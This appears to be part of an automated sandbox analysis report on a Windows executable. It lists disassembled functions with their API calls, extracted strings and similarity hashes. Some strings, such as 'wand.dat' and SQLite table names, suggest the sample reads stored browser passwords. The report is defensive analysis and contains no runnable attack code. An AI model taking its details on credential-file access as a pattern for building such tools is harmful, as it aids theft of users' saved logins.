                                                                                                                                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                                    • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                    • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                                                                                                    • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                    • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                    • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889144086-0
                                                                                                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1661045500-0
                                                                                                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                                                                                                    • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                    • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                                                    • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                    Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3550944819-0
                                                                                                                                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                    Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$free
                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                                                                                                    • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
